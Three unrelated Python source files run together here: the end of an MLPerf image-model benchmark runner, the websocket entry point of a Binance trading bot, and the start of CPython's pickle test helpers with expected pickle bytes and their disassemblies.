"backend": "onnxruntime",
"model-name": "resnet50",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet",
},
"mobilenet-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet",
},
# mobilenet2
"mobilenet2-tf": {
"inputs": "input:0",
"outputs": "MobilenetV2/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
"model-name": "mobilenet2",
},
"mobilenet2-onnxruntime": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV2/Predictions/Reshape_1:0",
"backend": "onnxruntime",
"model-name": "mobilenet2",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco-300",
"backend": "tensorflow",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-300-pt",
"backend": "pytorch-native",
"model-name": "ssd-mobilenet",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco-300",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-mobilenet",
},
# ssd-resnet34
"ssd-resnet34-tf": {
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"dataset": "coco-1200-tf",
"backend": "tensorflow",
"data-format": "NCHW",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-pytorch": {
"inputs": "image",
"outputs": "bboxes,labels,scores",
"dataset": "coco-1200-pt",
"backend": "pytorch-native",
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime": {
"dataset": "coco-1200-onnx",
"inputs": "image",
"outputs": "bboxes,labels,scores",
"backend": "onnxruntime",
"data-format": "NCHW",
"max-batchsize": 1,
"model-name": "ssd-resnet34",
},
"ssd-resnet34-onnxruntime-tf": {
"dataset": "coco-1200-tf",
"inputs": "image:0",
"outputs": "detection_bboxes:0,detection_classes:0,detection_scores:0",
"backend": "onnxruntime",
"data-format": "NHWC",
"model-name": "ssd-resnet34",
},
}
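# Illustrative invocation (a sketch; paths are placeholders and not part of the
# original file). A profile pre-fills backend/inputs/outputs/model-name, and any
# explicit flag still overrides the profile value:
#
#   python main.py --profile resnet50-tf --model /path/to/resnet50.pb \
#       --dataset-path /path/to/imagenet --scenario Offline --accuracy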
SCENARIO_MAP = {
"SingleStream": lg.TestScenario.SingleStream,
"MultiStream": lg.TestScenario.MultiStream,
"Server": lg.TestScenario.Server,
"Offline": lg.TestScenario.Offline,
}
last_timeing = []
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--scenario", default="SingleStream",
help="mlperf benchmark scenario, one of " + str(list(SCENARIO_MAP.keys())))
parser.add_argument("--max-batchsize", type=int, help="max batch size in a single inference")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--output", help="test results")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--model-name", help="name of the mlperf model, ie. resnet50")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--qps", type=int, help="target qps")
parser.add_argument("--cache", type=int, default=0, help="use cache")
parser.add_argument("--accuracy", action="store_true", help="enable accuracy pass")
parser.add_argument("--find-peak-performance", action="store_true", help="enable finding peak performance pass")
# file to use mlperf rules compliant parameters
parser.add_argument("--mlperf_conf", default="../../mlperf.conf", help="mlperf rules config")
# file for user LoadGen settings such as target QPS
parser.add_argument("--user_conf", default="user.conf", help="user config for user LoadGen settings such as target QPS")
# below will override mlperf rules compliant settings - don't use for official submission
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--max-latency", type=float, help="mlperf max latency in pct tile")
parser.add_argument("--samples-per-query", type=int, help="mlperf multi-stream sample per query")
args = parser.parse_args()
    # don't use defaults in argparse. Instead we default to a dict, override that with a profile
    # and take this as the default unless the command line gives a value
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.scenario not in SCENARIO_MAP:
parser.error("valid scanarios:" + str(list(SCENARIO_MAP.keys())))
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
from backend_onnxruntime import BackendOnnxruntime
backend = BackendOnnxruntime()
elif backend == "null":
from backend_null import BackendNull
backend = BackendNull()
elif backend == "pytorch":
from backend_pytorch import BackendPytorch
backend = BackendPytorch()
elif backend == "pytorch-native":
from backend_pytorch_native import BackendPytorchNative
backend = BackendPytorchNative()
elif backend == "tflite":
from backend_tflite import BackendTflite
backend = BackendTflite()
else:
raise ValueError("unknown backend: " + backend)
return backend
class Item:
"""An item that we queue for processing by the thread pool."""
def __init__(self, query_id, content_id, img, label=None):
self.query_id = query_id
self.content_id = content_id
self.img = img
self.label = label
self.start = time.time()
class RunnerBase:
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
self.take_accuracy = False
self.ds = ds
self.model = model
self.post_process = post_proc
self.threads = threads
self.take_accuracy = False
self.max_batchsize = max_batchsize
self.result_timing = []
def handle_tasks(self, tasks_queue):
pass
def start_run(self, result_dict, take_accuracy):
self.result_dict = result_dict
self.result_timing = []
self.take_accuracy = take_accuracy
self.post_process.start()
def run_one_item(self, qitem):
# run the prediction
processed_results = []
try:
results = self.model.predict({self.model.inputs[0]: qitem.img})
processed_results = self.post_process(results, qitem.content_id, qitem.label, self.result_dict)
if self.take_accuracy:
self.post_process.add_results(processed_results)
self.result_timing.append(time.time() - qitem.start)
except Exception as ex: # pylint: disable=broad-except
src = [self.ds.get_item_loc(i) for i in qitem.content_id]
log.error("thread: failed on contentid=%s, %s", src, ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
response_array = array.array("B", np.array(processed_results[idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
data, label = self.ds.get_samples(idx[i:i+bs])
self.run_one_item(Item(query_id[i:i+bs], idx[i:i+bs], data, label))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
self.tasks = Queue(maxsize=threads * 4)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
                # None in the queue indicates the parent wants us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
if len(query_samples) < self.max_batchsize:
data, label = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, data, label))
else:
bs = self.max_batchsize
for i in range(0, len(idx), bs):
ie = i + bs
data, label = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], data, label))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "mAP" in result_dict:
result["mAP"] = 100. * result_dict["mAP"]
acc_str += ", mAP={:.3f}%".format(result["mAP"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend)
# override image format if given
image_format = args.data_format if args.data_format else backend.image_format()
# --count applies to accuracy mode only and can be used to limit the number of images
# for testing. For perf model we always limit count to 200.
count_override = False
count = args.count
if count:
count_override = True
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
ds = wanted_dataset(data_path=args.dataset_path,
image_list=args.dataset_list,
name=args.dataset,
image_format=image_format,
pre_process=pre_proc,
use_cache=args.cache,
count=count, **kwargs)
# load model to backend
model = backend.load(args.model, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
img, _ = ds.get_samples([0])
_ = backend.predict({backend.inputs[0]: img})
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_name, args.scenario)
settings.FromConfig(user_conf, args.model_name, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.time:
# override the time we want to run
settings.min_duration_ms = args.time * MILLI_SEC
settings.max_duration_ms = args.time * MILLI_SEC
if args.qps:
qps = float(args.qps)
settings.server_target_qps = qps
settings.offline_expected_qps = qps
if count_override:
settings.min_query_count = count
settings.max_query_count = count
if args.samples_per_query:
settings.multi_stream_samples_per_query = args.samples_per_query
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, 500), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
__main__.py
|
import sys
import websocket
import threading
import time
from binance import Client
from wenmoon.Config import Config
from wenmoon.Bot import Bot
from wenmoon.strategies.macd_rsi_strategy import Strategy
# Get configurations
config = Config()
# Log into the binance client API using the supplied api key and secret
binance_client = Client(
config.api_key,
config.secret_key
)
# Get symbol info
symbol_info = binance_client.get_symbol_info(config.watch_symbol_pair)
# Get the strategy to be used
# strategy = get_strategy(config.strategy)
strategy = Strategy(symbol_info)
# strategy.scout("1", "2")
# print(strategy)
# Initialise bot
bot = Bot(config, strategy, binance_client)
# Set up the url for the required websocket stream (URL is case-sensitive)
socket = f"wss://stream.binance.com:9443/ws/{config.watch_symbol_pair.lower()}@kline_{config.interval}"
# Disable full websocket logging
websocket.enableTrace(False)
def on_message(ws, message):
"""Called when the websocket receives a message.
This function passes the message on to the Bot instance to handle.
Args:
ws: Websocket instance
message (str): The decoded message received from the websocket
"""
bot.handle_websocket_message(message)
def on_close(ws, close_status_code, close_msg):
"""Called when the websocket closes.
This could be due to an error or keyboard interrupt.
When the websocket connection closes, we attempt to reconnect to it here, and keep trying every 10 seconds.
Args:
        ws: Websocket instance
close_status_code (str):
close_msg (str):
"""
print("Websocket closed")
print(f"Closing with status code {close_status_code}")
print("Retry : %s" % time.ctime())
# Retry websocket reconnect every 10s
time.sleep(10)
connect_websocket()
def on_error(ws, error):
"""Called when the websocket encounters an error.
This function simply logs the error.
After an error, the websocket is automatically closed, and the on_close function is called.
Args:
        ws: Websocket instance
error (str): Error message
"""
print(f"ERROR: {error}")
def on_open(ws):
"""Called when the websocket is opened.
This function calls the bot.start function which handles initialisation of candle data and strategy.
Args:
ws: Websocket instance
"""
print("Starting bot")
bot.start()
def connect_websocket():
"""Handles connection to the websocket.
The socket url is defined outside this scope from the configuration file.
    This function initialises the websocket and specifies the callback functions for opening and closing the websocket,
along with message and error handling.
The websocket is run on a thread.
"""
print(f"Watching prices on {socket}")
ws = websocket.WebSocketApp(
socket,
on_open=on_open,
on_message=on_message,
on_error=on_error,
on_close=on_close
)
    # Pass the method itself (not the result of calling it) so run_forever executes on the worker thread
    wst = threading.Thread(target=ws.run_forever)
    wst.daemon = True
    wst.start()
    # Block here so the daemon worker thread is not killed when the main thread exits
    wst.join()
# main()
if __name__ == "__main__":
try:
connect_websocket()
except Exception as err:
print(err)
print("Connect failed")
|
pickletester.py
|
import collections
import copyreg
import dbm
import io
import functools
import os
import math
import pickle
import pickletools
import shutil
import struct
import sys
import threading
import unittest
import weakref
from textwrap import dedent
from http.cookies import SimpleCookie
try:
import _testbuffer
except ImportError:
_testbuffer = None
from test import support
from test.support import (
TestFailed, TESTFN, run_with_locale, no_tracing,
_2G, _4G, bigmemtest, reap_threads, forget,
save_restore_warnings_filters
)
from pickle import bytes_types
# bpo-41003: Save/restore warnings filters to leave them unchanged.
# Ignore filters installed by numpy.
try:
with save_restore_warnings_filters():
import numpy as np
except ImportError:
np = None
requires_32b = unittest.skipUnless(sys.maxsize < 2**32,
"test is only meaningful on 32-bit builds")
# Tests that try a number of pickle protocols should have a
# for proto in protocols:
# kind of outer loop.
protocols = range(pickle.HIGHEST_PROTOCOL + 1)
# Return True if opcode code appears in the pickle, else False.
def opcode_in_pickle(code, pickle):
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
return True
return False
# Return the number of times opcode code appears in pickle.
def count_opcode(code, pickle):
n = 0
for op, dummy, dummy in pickletools.genops(pickle):
if op.code == code.decode("latin-1"):
n += 1
return n
def identity(x):
return x
class UnseekableIO(io.BytesIO):
def peek(self, *args):
raise NotImplementedError
def seekable(self):
return False
def seek(self, *args):
raise io.UnsupportedOperation
def tell(self):
raise io.UnsupportedOperation
class MinimalIO(object):
"""
A file-like object that doesn't support readinto().
"""
def __init__(self, *args):
self._bio = io.BytesIO(*args)
self.getvalue = self._bio.getvalue
self.read = self._bio.read
self.readline = self._bio.readline
self.write = self._bio.write
# We can't very well test the extension registry without putting known stuff
# in it, but we have to be careful to restore its original state. Code
# should do this:
#
# e = ExtensionSaver(extension_code)
# try:
# fiddle w/ the extension registry's stuff for extension_code
# finally:
# e.restore()
class ExtensionSaver:
# Remember current registration for code (if any), and remove it (if
# there is one).
def __init__(self, code):
self.code = code
if code in copyreg._inverted_registry:
self.pair = copyreg._inverted_registry[code]
copyreg.remove_extension(self.pair[0], self.pair[1], code)
else:
self.pair = None
# Restore previous registration for code.
def restore(self):
code = self.code
curpair = copyreg._inverted_registry.get(code)
if curpair is not None:
copyreg.remove_extension(curpair[0], curpair[1], code)
pair = self.pair
if pair is not None:
copyreg.add_extension(pair[0], pair[1], code)
class C:
def __eq__(self, other):
return self.__dict__ == other.__dict__
class D(C):
def __init__(self, arg):
pass
class E(C):
def __getinitargs__(self):
return ()
# Simple mutable object.
class Object:
pass
# Hashable immutable key object containing unhashable mutable data.
class K:
def __init__(self, value):
self.value = value
def __reduce__(self):
# Shouldn't support the recursion itself
return K, (self.value,)
import __main__
__main__.C = C
C.__module__ = "__main__"
__main__.D = D
D.__module__ = "__main__"
__main__.E = E
E.__module__ = "__main__"
class myint(int):
def __init__(self, x):
self.str = str(x)
class initarg(C):
def __init__(self, a, b):
self.a = a
self.b = b
def __getinitargs__(self):
return self.a, self.b
class metaclass(type):
pass
class use_metaclass(object, metaclass=metaclass):
pass
class pickling_metaclass(type):
def __eq__(self, other):
return (type(self) == type(other) and
self.reduce_args == other.reduce_args)
def __reduce__(self):
return (create_dynamic_class, self.reduce_args)
def create_dynamic_class(name, bases):
result = pickling_metaclass(name, bases, dict())
result.reduce_args = (name, bases)
return result
class ZeroCopyBytes(bytes):
readonly = True
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
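# Illustrative round-trip for the class above (a sketch, not part of the original
# file): with protocol 5 the PickleBuffer branch is taken, so the buffer can be
# handed out-of-band instead of being copied into the pickle stream.
#
#   obj = ZeroCopyBytes(b"abc")
#   buffers = []
#   data = pickle.dumps(obj, protocol=5, buffer_callback=buffers.append)
#   roundtripped = pickle.loads(data, buffers=buffers)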
class ZeroCopyBytearray(bytearray):
readonly = False
c_contiguous = True
f_contiguous = True
zero_copy_reconstruct = True
def __reduce_ex__(self, protocol):
if protocol >= 5:
return type(self)._reconstruct, (pickle.PickleBuffer(self),), None
else:
return type(self)._reconstruct, (bytes(self),)
def __repr__(self):
return "{}({!r})".format(self.__class__.__name__, bytes(self))
__str__ = __repr__
@classmethod
def _reconstruct(cls, obj):
with memoryview(obj) as m:
obj = m.obj
if type(obj) is cls:
# Zero-copy
return obj
else:
return cls(obj)
if _testbuffer is not None:
class PicklableNDArray:
# A not-really-zero-copy picklable ndarray, as the ndarray()
# constructor doesn't allow for it
zero_copy_reconstruct = False
def __init__(self, *args, **kwargs):
self.array = _testbuffer.ndarray(*args, **kwargs)
def __getitem__(self, idx):
cls = type(self)
new = cls.__new__(cls)
new.array = self.array[idx]
return new
@property
def readonly(self):
return self.array.readonly
@property
def c_contiguous(self):
return self.array.c_contiguous
@property
def f_contiguous(self):
return self.array.f_contiguous
def __eq__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return (other.array.format == self.array.format and
other.array.shape == self.array.shape and
other.array.strides == self.array.strides and
other.array.readonly == self.array.readonly and
other.array.tobytes() == self.array.tobytes())
def __ne__(self, other):
if not isinstance(other, PicklableNDArray):
return NotImplemented
return not (self == other)
def __repr__(self):
return (f"{type(self)}(shape={self.array.shape},"
f"strides={self.array.strides}, "
f"bytes={self.array.tobytes()})")
def __reduce_ex__(self, protocol):
if not self.array.contiguous:
raise NotImplementedError("Reconstructing a non-contiguous "
"ndarray does not seem possible")
ndarray_kwargs = {"shape": self.array.shape,
"strides": self.array.strides,
"format": self.array.format,
"flags": (0 if self.readonly
else _testbuffer.ND_WRITABLE)}
pb = pickle.PickleBuffer(self.array)
if protocol >= 5:
return (type(self)._reconstruct,
(pb, ndarray_kwargs))
else:
# Need to serialize the bytes in physical order
with pb.raw() as m:
return (type(self)._reconstruct,
(m.tobytes(), ndarray_kwargs))
@classmethod
def _reconstruct(cls, obj, kwargs):
with memoryview(obj) as m:
# For some reason, ndarray() wants a list of integers...
# XXX This only works if format == 'B'
items = list(m.tobytes())
return cls(items, **kwargs)
# DATA0 .. DATA4 are the pickles we expect under the various protocols, for
# the object returned by create_data().
DATA0 = (
b'(lp0\nL0L\naL1L\naF2.0\n'
b'ac__builtin__\ncomple'
b'x\np1\n(F3.0\nF0.0\ntp2\n'
b'Rp3\naL1L\naL-1L\naL255'
b'L\naL-255L\naL-256L\naL'
b'65535L\naL-65535L\naL-'
b'65536L\naL2147483647L'
b'\naL-2147483647L\naL-2'
b'147483648L\na(Vabc\np4'
b'\ng4\nccopy_reg\n_recon'
b'structor\np5\n(c__main'
b'__\nC\np6\nc__builtin__'
b'\nobject\np7\nNtp8\nRp9\n'
b'(dp10\nVfoo\np11\nL1L\ns'
b'Vbar\np12\nL2L\nsbg9\ntp'
b'13\nag13\naL5L\na.'
)
# Disassembly of DATA0
DATA0_DIS = """\
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 0
9: a APPEND
10: L LONG 1
14: a APPEND
15: F FLOAT 2.0
20: a APPEND
21: c GLOBAL '__builtin__ complex'
42: p PUT 1
45: ( MARK
46: F FLOAT 3.0
51: F FLOAT 0.0
56: t TUPLE (MARK at 45)
57: p PUT 2
60: R REDUCE
61: p PUT 3
64: a APPEND
65: L LONG 1
69: a APPEND
70: L LONG -1
75: a APPEND
76: L LONG 255
82: a APPEND
83: L LONG -255
90: a APPEND
91: L LONG -256
98: a APPEND
99: L LONG 65535
107: a APPEND
108: L LONG -65535
117: a APPEND
118: L LONG -65536
127: a APPEND
128: L LONG 2147483647
141: a APPEND
142: L LONG -2147483647
156: a APPEND
157: L LONG -2147483648
171: a APPEND
172: ( MARK
173: V UNICODE 'abc'
178: p PUT 4
181: g GET 4
184: c GLOBAL 'copy_reg _reconstructor'
209: p PUT 5
212: ( MARK
213: c GLOBAL '__main__ C'
225: p PUT 6
228: c GLOBAL '__builtin__ object'
248: p PUT 7
251: N NONE
252: t TUPLE (MARK at 212)
253: p PUT 8
256: R REDUCE
257: p PUT 9
260: ( MARK
261: d DICT (MARK at 260)
262: p PUT 10
266: V UNICODE 'foo'
271: p PUT 11
275: L LONG 1
279: s SETITEM
280: V UNICODE 'bar'
285: p PUT 12
289: L LONG 2
293: s SETITEM
294: b BUILD
295: g GET 9
298: t TUPLE (MARK at 172)
299: p PUT 13
303: a APPEND
304: g GET 13
308: a APPEND
309: L LONG 5
313: a APPEND
314: . STOP
highest protocol among opcodes = 0
"""
DATA1 = (
b']q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c__'
b'builtin__\ncomplex\nq\x01'
b'(G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00t'
b'q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ'
b'\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff'
b'\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00ab'
b'cq\x04h\x04ccopy_reg\n_reco'
b'nstructor\nq\x05(c__main'
b'__\nC\nq\x06c__builtin__\n'
b'object\nq\x07Ntq\x08Rq\t}q\n('
b'X\x03\x00\x00\x00fooq\x0bK\x01X\x03\x00\x00\x00bar'
b'q\x0cK\x02ubh\ttq\rh\rK\x05e.'
)
# Disassembly of DATA1
DATA1_DIS = """\
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 0
6: K BININT1 1
8: G BINFLOAT 2.0
17: c GLOBAL '__builtin__ complex'
38: q BINPUT 1
40: ( MARK
41: G BINFLOAT 3.0
50: G BINFLOAT 0.0
59: t TUPLE (MARK at 40)
60: q BINPUT 2
62: R REDUCE
63: q BINPUT 3
65: K BININT1 1
67: J BININT -1
72: K BININT1 255
74: J BININT -255
79: J BININT -256
84: M BININT2 65535
87: J BININT -65535
92: J BININT -65536
97: J BININT 2147483647
102: J BININT -2147483647
107: J BININT -2147483648
112: ( MARK
113: X BINUNICODE 'abc'
121: q BINPUT 4
123: h BINGET 4
125: c GLOBAL 'copy_reg _reconstructor'
150: q BINPUT 5
152: ( MARK
153: c GLOBAL '__main__ C'
165: q BINPUT 6
167: c GLOBAL '__builtin__ object'
187: q BINPUT 7
189: N NONE
190: t TUPLE (MARK at 152)
191: q BINPUT 8
193: R REDUCE
194: q BINPUT 9
196: } EMPTY_DICT
197: q BINPUT 10
199: ( MARK
200: X BINUNICODE 'foo'
208: q BINPUT 11
210: K BININT1 1
212: X BINUNICODE 'bar'
220: q BINPUT 12
222: K BININT1 2
224: u SETITEMS (MARK at 199)
225: b BUILD
226: h BINGET 9
228: t TUPLE (MARK at 112)
229: q BINPUT 13
231: h BINGET 13
233: K BININT1 5
235: e APPENDS (MARK at 3)
236: . STOP
highest protocol among opcodes = 1
"""
DATA2 = (
b'\x80\x02]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'__builtin__\ncomplex\n'
b'q\x01G@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00'
b'\x86q\x02Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xff'
b'J\x00\xff\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff'
b'\xff\xff\x7fJ\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00a'
b'bcq\x04h\x04c__main__\nC\nq\x05'
b')\x81q\x06}q\x07(X\x03\x00\x00\x00fooq\x08K\x01'
b'X\x03\x00\x00\x00barq\tK\x02ubh\x06tq\nh'
b'\nK\x05e.'
)
# Disassembly of DATA2
DATA2_DIS = """\
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
19: c GLOBAL '__builtin__ complex'
40: q BINPUT 1
42: G BINFLOAT 3.0
51: G BINFLOAT 0.0
60: \x86 TUPLE2
61: q BINPUT 2
63: R REDUCE
64: q BINPUT 3
66: K BININT1 1
68: J BININT -1
73: K BININT1 255
75: J BININT -255
80: J BININT -256
85: M BININT2 65535
88: J BININT -65535
93: J BININT -65536
98: J BININT 2147483647
103: J BININT -2147483647
108: J BININT -2147483648
113: ( MARK
114: X BINUNICODE 'abc'
122: q BINPUT 4
124: h BINGET 4
126: c GLOBAL '__main__ C'
138: q BINPUT 5
140: ) EMPTY_TUPLE
141: \x81 NEWOBJ
142: q BINPUT 6
144: } EMPTY_DICT
145: q BINPUT 7
147: ( MARK
148: X BINUNICODE 'foo'
156: q BINPUT 8
158: K BININT1 1
160: X BINUNICODE 'bar'
168: q BINPUT 9
170: K BININT1 2
172: u SETITEMS (MARK at 147)
173: b BUILD
174: h BINGET 6
176: t TUPLE (MARK at 113)
177: q BINPUT 10
179: h BINGET 10
181: K BININT1 5
183: e APPENDS (MARK at 5)
184: . STOP
highest protocol among opcodes = 2
"""
DATA3 = (
b'\x80\x03]q\x00(K\x00K\x01G@\x00\x00\x00\x00\x00\x00\x00c'
b'builtins\ncomplex\nq\x01G'
b'@\x08\x00\x00\x00\x00\x00\x00G\x00\x00\x00\x00\x00\x00\x00\x00\x86q\x02'
b'Rq\x03K\x01J\xff\xff\xff\xffK\xffJ\x01\xff\xff\xffJ\x00\xff'
b'\xff\xffM\xff\xffJ\x01\x00\xff\xffJ\x00\x00\xff\xffJ\xff\xff\xff\x7f'
b'J\x01\x00\x00\x80J\x00\x00\x00\x80(X\x03\x00\x00\x00abcq'
b'\x04h\x04c__main__\nC\nq\x05)\x81q'
b'\x06}q\x07(X\x03\x00\x00\x00barq\x08K\x02X\x03\x00'
b'\x00\x00fooq\tK\x01ubh\x06tq\nh\nK\x05'
b'e.'
)
# Disassembly of DATA3
DATA3_DIS = """\
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 0
8: K BININT1 1
10: G BINFLOAT 2.0
